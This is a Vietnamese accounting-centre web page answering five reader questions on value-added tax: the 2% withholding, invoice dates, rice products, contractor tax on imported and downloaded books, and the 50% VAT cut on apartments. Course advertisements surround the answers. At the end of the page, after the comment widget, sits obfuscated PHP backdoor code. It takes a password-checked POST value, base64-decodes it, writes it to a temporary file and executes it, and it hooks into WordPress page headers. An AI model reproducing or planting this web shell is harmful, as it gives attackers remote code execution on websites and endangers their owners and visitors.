1

Các tình huống về thuế GTGT phần 3

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Trung tâm kế toán Hà Nội chia sẻ với người yêu kế toán về một số tình huống hỏi đáp về thuế GTGT phần 3

Câu hỏi 1: Theo CV 6789 thực hiện khấu trừ 2% thuế GTGT, xin Ban biên tập hướng dẫn rõ tr/h: nếu đơn vị thi công bán thiết bị mà mặt hàng đó chịu thuế suất 0% thì CĐT có trích 2% thuế không?,hoặc mặt hàng chịu thuế suất 5% thì CĐT trích 1% để nộp hay 2%?
Trả lời:
CV 6789 mà Bạn nêu trong thư là hướng dẫn bổ sung CV số 17848 của Bộ Tài chính về việc KBNN trích 2% giá trị thanh toán khối lượng công trình theo phiếu rút vốn đầu tư của Chủ đầu tư. Theo đó, trường hợp thanh toán giá trị khối lượng xây lắp, thiết bị thì chích 2% , không trích đối với thanh toán khối lượng tư vấn, khảo sát .
Đối với khối lượng thiết bị thì cũng khấu trừ 2%, riêng các mặt hàng thiết bị mà thuế suất thuế GTGT là 5% thì trích khấu trừ 1% (vì theo quy định chung mặt hàng có thuế suất 10% sẽ trích 2%; mặt hàng thuế suất 5% sẽ trích 1%).

Câu hỏi 2: Tôi xin hỏi việc đơn vị chưa xuất hóa đơn và nộp thuế GTGT đối với số tiền đã được phòng TN&MT tạm ứng từ năm 2011 và đầu năm 2012 có bị xem là hành vi trốn thuế và chậm nộp thuế không . Đề nghị Quý cơ quan giúp đỡ trả lời sớm để chúng tôi được rõ và thực hiện kê khai thuế GTGT và nộp thuế theo đúng quy định.
Trả lời:
Thư bạn đọc không nêu rõ trường hợp của Bạn có Hợp đồng kinh tế ký với phòng TN&MT không? và Khoản tạm ứng đó với nội dung kinh tế về việc gì.
Vì vậy chúng tôi giả định rằng DN của Bạn thực hiện một dịch vụ cho Phòng TN&MT, dịch vụ này diễn ra trong 1 khoảng thời gian nhất định và phòng TNMT trả tiền dần cho DN dưới hình thức tạm ứng.
Theo quy định hiện hành, khi bán hàng, cung cấp dịch vụ thì phải xuất hóa đơn, và căn cứ vào hóa đơn để kê khai thuế GTGT và hạch toán doanh thu. Tại điểm a, khoản 2, điều 14 Thông tư số 64/2013/TT-BTC quy định :
“Ngày lập hóa đơn đối với bán hàng hóa là thời điểm chuyển giao quyền sở hữu hoặc quyền sử dụng hàng hóa cho người mua, không phân biệt đã thu được tiền hay chưa thu được tiền.
Ngày lập hóa đơn đối với cung ứng dịch vụ là ngày hoàn thành việc cung ứng dịch vụ, không phân biệt đã thu được tiền hay chưa thu được tiền. Trường hợp tổ chức cung ứng dịch vụ thực hiện thu tiền trước hoặc trong khi cung ứng dịch vụ thì ngày lập hóa đơn là ngày thu tiền.”
Trường hợp của Bạn chưa xuất hóa đơn, chưa kê khai nộp thuế GTGT thì có vi phạm quy định về hóa đơn và khai thuế GTGT sẽ bị xử phạt vi phạm hành chính, nếu DN khắc phục ngay bằng cách xuất hóa đơn và khai thuế GTGT thì không bị xử phạt về hành vi trốn thuế.

Câu hỏi 3: Ngày 18/12/2013 Chính phủ đã ban hành nghị định 209/2003/nđ-cp về thuế giá gia tăng. Ngày 09/1/2014, Bộ Tài chính có công văn số 385/CST-BTC gửi UBND và Cục thuế các tỉnh, thành. Là doanh nghiệp xay xát, đánh bóng, chế biến gạo, chúng tôi xin hỏi: theo qui định mới các mặt hàng gạo, tấm, cám có thuộc diện không chịu thuế GTGT hay không? (các mặt hàng này hiện đang chịu thuế suất VAT 5%) ?
Trả lời:
Theo quy định của Luật thuế GTGT, Nghị định số 209/2013 mà Bạn trích dẫn trong thư hỏi thì các mặt hàng gạo, tấm, cám là sản phẩm trồng trọt qua sơ chế nên thuộc diện chịu thuế GTGT với mức thuế suất 5% như đã và đang thực hiện lâu nay.
Nghị định số 209/2013 có quy định mới (tại điểm đ, khoản 3, điều 2) về việc không phải tính, khai nộp thuế trong trường hợp các sản phẩm này được bán cho người mua là doanh nghiệp, hợp tác xã. Quy định mới này giúp DN, HTX đỡ phải bỏ tiền ra để trả thuế GTGT, và khi xuất khẩu gạo thì nhà nước cũng không phải hoàn thuế GTGT.
DN của Bạn là cơ sở xay xát gạo nên cần lưu ý các trường hợp người mua hàng của cơ sở để thực hiện đúng các quy định của Thông tư số 219/2013/TT-BTC hướng dẫn Nghị định 209/2013, cụ thể là:
– Nếu người mua là cá nhân, tổ chức không phải là doanh nghiệp, tổ chức không phải là HTX thì áp thuế GTGT 5%
– Nếu người mua là doanh nghiệp, HTX thì không tính thuế GTGT và cũng không phải kê nộp thuế đối với các hóa đơn bán cho đối tượng này. Chúc sức khoẻ và thành công./.

Câu hỏi 4: Công ty tôi hoạt động trong lĩnh vực đào tạo CNTT không chịu thuế GTGT. Ban biên tập cho công ty tôi hỏi 2 vấn đề: 1/ Trường hợp, công ty tôi nhập sách từ nước ngoài về(phục vụ đào tạo) vậy khi nộp thuế nhà thầu có phải chịu thuế GTGT không? 2/ Trường hợp, công ty tôi có ký kết mua sách của nhà thầu nước ngoài dưới hình thức download trực tuyến về thì có phải chịu thuế nhà thầu không?

Trả lời:
Thuế nhà thầu nước ngoài gồm có thuế GTGT, thuế TNDN và/hoặc thuế TNCN.
Mặt hàng, dịch vụ chịu thuế GTGT thì tuân theo quy định của Luật thuế GTGT, do vậy mặt hàng sách giáo khoa, giáo trình, sách khoa học kỹ thuật,… thuộc diện không chịu thuế GTGT trong tất cả các khâu, do đó sẽ không phải trả thuế, không phải nộp thuế GTGT khi kê khai nộp thuế nhà thầu.
Đối với trường hợp mua sách của Bên nước ngoài dưới hình thức download trực tuyến thì cũng phải chịu thuế nhà thầu, chỉ bao gồm thuế TNDN nhà thầu mà không gồm thuế GTGT vì sách loại này phải trả tiền phí bản quyền thì mới sử dụng download được.

Câu hỏi 5: Năm 2010 tôi có mua căn hộ có diện tích : 51m2, giá mua đã bao gốm thuế VAT, phí bảo trì là 14.000.000 đ/1m2. trong hợp đồng ghi chủ đầu tư giao nhà trong tháng 03/2012 cũng đồng thời cũng quy định tôi phải thanh toán 95% tiền nhà vào thời gian này (trong đó có 5% phải thanh toán khi giao nhà). nhưng đến tháng 10/2013 thì nhà đầu tư mới giao nhà và tôi cũng mới thanh toán 80% căn hộ. Vậy cho tôi hỏi : 1. Trong tháng 10/2013 tôi mới thanh toán 10%giá trị căn nhà còn nợ (đáng lẽ ra tôi phải thanh toán vào tháng 02/2012). khoản tiền này tôi có được giảm 50% thuế VAT không? 2. Khoản tiền phải thanh toán 5% giá trị căn nhà vào thời điểm giao nhà (tháng 10/2013)đáng lẽ ra phải thanh toán vào tháng 3/2012 vì do nhà đầu tư chưa giao nhà nên mới thanh toán vào thời gian này, vậy khoàn tiền này khi tôi thanh toán có được giảm 50% thuế VAT không? 3.Số tiền còn lại 5% giá trị căn nhà phải thanh toán khi nhận giấy tờ nhà khi nhận sổ hồng, nhưng tôi thanh toán trước t06/2014 có được giảm 50% VAT?
Trả lời:
Mục đích của chính sách giảm thuế là nhằm tạo cơ hội thuận lợi cho người dân có điều kiện mua nhà là căn hộ thuộc diện trích dẫn trên, cũng như thúc đẩy thị trường BĐS, thời gian giảm 50% thuế được áp dụng trong 01 năm (từ 01/7/2013 đến hết 30/6/2014). Với những Hợp đồng ghi rõ tiến độ thanh toán tiền thì những khoản thanh toán theo Hợp đồng được thực hiện trong khoảng thời gian nêu trên được giảm thuế.
Trường hợp của Bạn, do DN giao nhà chậm cho nên, trong trường hợp 2 bên mua/bán điều chỉnh Hợp đồng thì theo quy định tại khoản 7 điều 4 Thông tư số 141/2013 thì các khoản tiền thanh toán thực tế, xuất hóa đơn được diễn ra từ 01/7/2013 đến hết 30/6/2014 phù hợp với hợp đồng (được điều chỉnh) được giảm 50% thuế GTGT.

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}